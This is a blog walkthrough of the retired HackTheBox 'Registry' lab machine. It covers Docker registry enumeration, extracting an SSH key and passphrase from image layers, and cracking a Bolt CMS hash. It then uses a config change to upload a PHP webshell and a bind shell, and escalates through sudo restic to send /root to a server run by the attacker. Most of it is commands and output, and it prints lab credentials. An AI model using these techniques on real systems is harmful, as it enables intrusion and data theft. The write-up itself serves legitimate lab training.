Hackthebox - Registry server



Registry is retired Linux server on the HackTheBox penetration testing lab. It was marked with Hard difficulty and can be cracked by using vulnerabilities in Docker, Bolt CMS and Restic backup software... There are 2 ways how to proceed with this server. The first one was to install docker on a local system and import the image found. I choose not to do this and used bit of reverse engineering & searched the image manually. 
As usual, I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why. 
We will use/learn: nmap, gobustDocker, White Wolf Webshell, reverse shell, Bolt CMS, Restic, port forwarding

Getting User:

I am going to add the server's IP (10.10.10.159) to /etc/hosts file, so I can keep using the hostname (registry.htb) instead of the IP address.

Let's start with a basic enumeration of the ports & services running on the server with nmap (Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing. Source.  

For those not familiar with the command I suggest checking this cheat-sheet first:  CheatSheet

command: nmap -sC -sV -A -p- registry.htb

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
|   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp  open  http     nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after:  2029-05-03T21:14:35

 So let's modify the /etc/hosts and add docker.registry.htb there as well

 https://docker.registry.htb shows empty page, so let's try gobuster to see if we can find something. (Gobuster is a tool used to brute-force URIs (directories and files) in web sites, DNS subdomains (with wildcard support) etc. You can download it here)

root@kali:~/Downloads/HTB/registry.htb# 
gobuster dir -u http://docker.registry.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,js,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://docker.registry.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,js,txt
[+] Timeout:        10s
===============================================================
2020/03/10 13:56:42 Starting gobuster
===============================================================
/v2 (Status: 301)
===============================================================
2020/03/10 13:57:43 Finished
===============================================================

And we can see it finds v2 directory! 

 https://docker.registry.htb/v2 asks for username and password. Hydra kept getting me lots of false positives (the system is most likely protected against a brute-force attack), so let’s try guessing. Admin/admin works! I tried to gobuster &  wfuzz the v2 directory further, but it did not find anything. 

 So let’s study docker a little: Docker_Link. In here you can find out that docker has something that is called catalog, and by default it is accessible via v2/_catalog: 


So let's check what is in there: 

This part really took me a while to figure out with a help on the HTB forum. We have a bolt-image, which is accessible via ../v2/ . So now we have another part of the puzzle: https://docker.registry.htb/v2/bolt-image/ ... 

So let's download the latest bolt-image manifest:


The manifest looks like this: 
root@kali:~/Downloads/HTB/registry.htb# cat latest 
{
   "schemaVersion": 1,
   "name": "bolt-image",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
      },
      {
         "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
      },
      {
         "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
      },
      {
         "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
...
...
...

So let's start checking them up. Download the first one:

https://docker.registry.htb/v2/bolt-image/blobs/sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee

And check what they are (as we cannot read them). And it looks like it is gzip file: 

file sha256_302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b 
 gzip compressed data, original size modulo 2^32 6656

So I renamed it to *.gz file and unpacked:
root@kali:~/Downloads/HTB/registry.htb# mv sha256_302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b 1.gz
root@kali:~/Downloads/HTB/registry.htb# gunzip 1.gz





And in the first file we can see password GkOcz221Ftb3ugog:


^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact





So now we have the password, but we don't have any username. In the 5.th file (the 100 MB big one) there is a private key! 






-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9

KF9YHXRjDZ35Q9ybzkhcUNKF8DSZ+aNLYXPL3kgdqlUqwfpqpbVdHbMeDk7qbS7w
KhUv4Gj22O1t3koy9z0J0LpVM8NLMgVZhTj1eAlJO72dKBNNv5D4qkIDANmZeAGv
...


...
...
94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
-----END RSA PRIVATE KEY-----




Now we can login as user bolt:






ssh -i ./private_key bolt@registry
Enter passphrase for key './private_key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Tue Mar 10 22:49:08 UTC 2020

  System load:  0.0               Users logged in:                0
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 26%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1After 
  Processes:    154
Last login: Tue Mar 10 09:41:06 2020 from 10.10.14.33
bolt@bolt:~$





Also, the password is: GkOcz221Ftb3ugog not GkOcz221Ftb3ugog\n (the \n character is a code for a new line..). Now we can get the User's flag in user.txt file. 







Getting Root:



After enumering the system, we will find a database file in /var/www/html/bolt/app/database/bolt.db











When we check the file, we see a hash in there:













^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<81>-^A^Q^@^W<81>^E/3!^W7   


@^H^@3admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb2019-10-17 


14:34:5210.10.14.2Admin["files://shell.php"]["root","everyone"]









The hash can be cracked by John The Ripper tool (John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS. Source). Let's store it in db_hash.txt file and crack it: 






root@kali:~/Downloads/HTB/registry.htb# 


john --wordlist=/usr/share/wordlists/rockyou.txt /root/Downloads/HTB/registry.htb/db_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (?)
1g 0:00:00:04 DONE (2020-03-11 18:52) 0.2016g/s 72.58p/s 72.58c/s 72.58C/s strawberry..brianna
Use the "--show" option to display all of the cracked passwords reliably
Session completed








So we have admin's password. However, we still don't have place to put it. So step back and think WHERE we found the hash. It was in in /var/www/html/bolt directory, which is used for storing websites. Let's try to put http://registry.htb/bolt to browser. And it  brings up a page!  







Let's scan it with gobuster again. As the enumeration found a database, I am expecting to find a login page to the DB. We need to change our wordlist to dirbuster's directory-list-2.3-medium.txt. 










root@kali:~/Downloads/HTB/registry.htb# gobuster dir -u http://registry.htb/bolt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,js,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://registry.htb/bolt
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,js,txt
[+] Timeout:        10s
===============================================================
2020/03/11 19:06:16 Starting gobuster
===============================================================
/index.php (Status: 200)
/files (Status: 301)
/tests (Status: 301)
/src (Status: 301)
/app (Status: 301)
/theme (Status: 301)
/vendor (Status: 301)
/extensions (Status: 301)
/bolt (Status: 302)








and we find another /bolt! So let's add it to the browser and we get a login page: 



















I checked several exploits (with metasploit) for Bolt CMS, but none of them seemed to work for me. So I checked the HTB forum and someone suggested, that we are able to edit the main config files and modify it so we can upload our shell. Basically we allow ourselves to upload a PHP shell by adding php suffix to the list of allowed files. But first download the bindshell (after hours of testing I found out that the reverse shell does not work!!! ). The bind shell can be found here: Download







Upload it to the server : scp -i id_rsa bindshell.py bolt@registry.htb:/tmp 







Now enable the PHP files to be uploaded and execute it.















Now you have to be really quick. Go to File Managerment - select upload file, upload your White Wolf webshell and execute it. In the WWW php shell's command line run python /tmp/bindshell.py . 











and in your kali linux run:






nc  10.10.10.159 2400
[3881] bindshell on port 2400
password? mtso   <--- password is needed!!!!
www-data@bolt:~/html/bolt/files$












and you get shell as www-data user. "sudo -l" commands hows us we can run restic as root:






www-data@bolt:~/html/bolt/files$ sudo -l 
Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*







Restic is a backup tool (Link).  So the plan is to backup a root directory and "restore" it on my own machine. That way I should be able to read the root.txt file stored in root’s homedir. Or  better - gain root’s private_rsa key. 



Let’s install it on the Kali box: 





command: apt-get install restic











initialize the repository:






root@kali:~/Downloads/HTB/registry.htb# restic init --repo /root/Downloads/HTB/registry.htb/restic_backup
enter password for new repository:  <---- pavel 
enter password again:  <---- pavel
created restic repository 518c14029a at /root/Downloads/HTB/registry.htb/restic_backup








Add the password to your password manager as once you lose it, you won't have access to your repository again. Now, we have to get rest-server to be able to run the backup: Get it from Github:






root@kali:~/Downloads/scripts# git clone https://github.com/restic/rest-server.git
Cloning into 'rest-server'...
remote: Enumerating objects: 32, done.
remote: Counting objects: 100% (32/32), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 3136 (delta 11), reused 17 (delta 5), pack-reused 3104
Receiving objects: 100% (3136/3136), 5.63 MiB | 4.15 MiB/s, done.
Resolving deltas: 100% (1158/1158), done.








Also install Go Installer: apt-get install golang-go  And then compile & install the rest-server: 


root@kali:~/Downloads/scripts/rest-server# make 
root@kali:~/Downloads/scripts/rest-server# make install
/usr/bin/install -m 755 rest-server /usr/local/bin/rest-server







And run it: 








root@kali:~/Downloads/scripts/rest-server# rest-server --path /root/Downloads/HTB/registry.htb/restic_backup/ --no-auth
Data directory: /root/Downloads/HTB/registry.htb/restic_backup/
Authentication disabled
Private repositories disabled
Starting server on :8000










Restic use port 8000, so let's do the port forwarding so we can run the backup and store it on our system (In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. Wikipedia):






root@kali:~/Downloads/HTB/registry.htb# ssh -R 8000:10.10.14.6:8000 -i ./private_key bolt@registry.htb
Enter passphrase for key './private_key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Wed Mar 11 21:35:19 UTC 2020

  System load:  0.0               Users logged in:                1
  Usage of /:   6.1% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 34%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    164

  => There is 1 zombie process.
Last login: Wed Mar 11 21:33:19 2020 from 10.10.14.6
bolt@bolt:~$ 












Now, switch back to the www-data terminal and run backup of the /root directory :






www-data@bolt:~/html/bolt/files$ 


sudo restic backup -r rest:http://127.0.0.1:8000/restic_backup /root
<p -r rest:http://127.0.0.1:8000/restic_backup /root
enter password for repository: pavel

password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:00] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00 
duration: 0:00
snapshot 51ae3cc4 saved








And recover it on the local Kali server: 






root@kali:~/Downloads/HTB/registry.htb/restic_backup# 


restic -r restic_backup restore latest --target restore




enter password for repository:  pavel
repository aa0befce opened successfully, password is correct


created new cache in /root/.cache/restic
restoring <Snapshot 51ae3cc4 of [/root] at 2020-03-11 21:49:14.025333836 +0000 UTC by root@bolt> to restore








Once the restore is complete, you can get the root.txt file : 






root@kali:~/Downloads/HTB/registry.htb/restic_backup/restore/root# cat root.txt 
ntrkz......tgw





















































































Comments











Post a Comment



















Popular posts from this blog









Hack The Box - Writeup server




















Image







     Writeup is retired Linux server on the HackTheBox penetration testing lab. It was marked with  Easy difficulty , which again makes it an ideal candidate for beginners to start with. I am writing this blog as there is almost identical vulnerability as in one recently released server.  As usual, I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why.    We will use/learn:  nmap, www.exploit-db, pspy, reverse shell,         Getting User:    Let's start with basic enumeration of the ports & services running on the server with nmap ( Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.  Source ).       For those not familiar with the command I suggest checking this cheat-sheet first:   nmap-cheat-sheet .      Before we start, let's add the IP address of the server (10.10.10.138) into /etc/hosts file , ...








Read more










Hack The Box - Sniper Server




















Image







        Sniper is retired (28.3.2020) Microsoft Windows server on the HackTheBox penetration testing lab. It was marked with  Medium difficulty  and can be cracked by using a vulnerability in  Windows help files...  As usual, I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why.      We will use/learn:  nmap, burpsuite, samba, enum4linux, reverse shell, netcat, powershell & credentials creation from cleartext in PS, Windows Help files (*.chm) etc.       Getting User:    I am going to add the server's IP (10.10.10.151) to /etc/hosts file, so I can keep using the hostname (sniper.htb) instead of the IP address.   Let's start with a basic enumeration of the ports & services running on the server with nmap ( Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing.  Source .       For those not familiar with the command...








Read more